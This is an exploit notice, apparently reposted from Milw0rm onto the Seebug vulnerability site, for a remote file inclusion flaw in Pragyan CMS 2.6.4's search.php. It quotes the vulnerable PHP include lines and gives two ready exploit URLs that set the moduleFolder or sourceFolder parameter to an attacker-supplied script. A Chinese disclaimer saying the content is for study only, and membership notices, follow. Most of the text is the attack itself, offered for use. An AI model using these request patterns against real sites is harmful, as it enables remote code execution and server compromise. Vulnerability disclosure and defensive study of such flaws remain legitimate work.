###################### Author: ############################# Author: Mr.SeCreT E-mail: g-ff@hotmail.com<mailto:g-ff@hotmail.com> From: Syria Greeting To: Milw0rm ############## Script Information: ######################### Scipt: Pragyan CMS 2.6.4 (Search.php) Remote File Inclusion Vulnerability Language: PHP Download: http://garr.dl.sourceforge.net/project/pragyan/pragyan/2.6.4/pragyan-2.6.4.tar.gz register_globals = On ################### Vul Code: ############################## $searchModuleFolder = "$sourceFolder/$moduleFolder/search"; $include_dir = "$searchModuleFolder/include"; include ("$include_dir/commonfuncs.php"); ################### Exploit: ############################### www.site.com/path/cms/modules/search/search.php?moduleFolder=[Evil<http://www.site.com/path/cms/modules/search/search.php?moduleFolder=[Evil> Script] www.site.com/path/cms/modules/search/search.php?sourceFolder=[Evil<http://www.site.com/path/cms/modules/search/search.php?sourceFolder=[Evil> Script] ############################################################ The End
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论